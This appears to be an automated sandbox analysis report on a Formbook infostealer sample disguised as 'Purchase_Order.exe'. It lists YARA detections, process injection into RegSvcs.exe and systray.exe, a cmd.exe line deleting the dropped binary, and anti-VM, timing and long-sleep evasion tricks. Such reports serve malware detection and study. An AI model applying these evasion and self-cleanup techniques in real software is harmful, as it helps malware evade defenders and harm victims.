Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@13/10
Source: C:\Users\user\Desktop\Purchase_Order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase_Order.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_01
Source: C:\Users\user\Desktop\Purchase_Order.exe Mutant created: \Sessions\1\BaseNamedObjects\rjmTOaAYwV
Source: C:\Users\user\Desktop\Purchase_Order.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: Purchase_Order.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase_Order.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Purchase_Order.exe Virustotal: Detection: 20%
Source: Purchase_Order.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\Purchase_Order.exe File read: C:\Users\user\Desktop\Purchase_Order.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Purchase_Order.exe 'C:\Users\user\Desktop\Purchase_Order.exe'
Source: C:\Users\user\Desktop\Purchase_Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase_Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Purchase_Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase_Order.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Purchase_Order.exe Static file information: File size 1532416 > 1048576
Source: Purchase_Order.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x14da00
Source: Purchase_Order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Purchase_Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: systray.pdb source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb source: Purchase_Order.exe
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
Source: Binary string: RegSvcs.pdb source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_004F73C3 push 0000006Fh; ret 0_2_004F73CE
Source: C:\Users\user\Desktop\Purchase_Order.exe Code function: 0_2_004F67F4 push es; ret 0_2_004F67FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004160EF push ebp; retf 4_2_004160F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00415250 push 00000036h; ret 4_2_0041525C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004152DE push ebp; retf 4_2_004152F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B46C push eax; ret 4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B402 push eax; ret 4_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0041B40B push eax; ret 4_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00414E67 pushfd ; retf 4_2_00414E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012CD0D1 push ecx; ret 4_2_012CD0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_04FBD0D1 push ecx; ret 16_2_04FBD0E4
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D60EF push ebp; retf 16_2_010D60F2
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB3B5 push eax; ret 16_2_010DB408
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D5250 push 00000036h; ret 16_2_010D525C
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D52DE push ebp; retf 16_2_010D52F6
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB40B push eax; ret 16_2_010DB472
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB402 push eax; ret 16_2_010DB408
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010DB46C push eax; ret 16_2_010DB472
Source: C:\Windows\SysWOW64\systray.exe Code function: 16_2_010D4E67 pushfd ; retf 16_2_010D4E68
Source: initial sample Static PE information: section name: .text entropy: 7.38800218232
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase_Order.exe PID: 1528, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000010C85E4 second address: 00000000010C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000010C897E second address: 00000000010C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239531 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238891 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238750 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238406 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238297 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237219 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236094 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234703 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234047 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233781 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233375 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233266 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233141 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233016 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232797 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232688 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232438 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232078 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231469 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Purchase_Order.exe Window / User API: threadDelayed 2691 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Window / User API: threadDelayed 5275 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
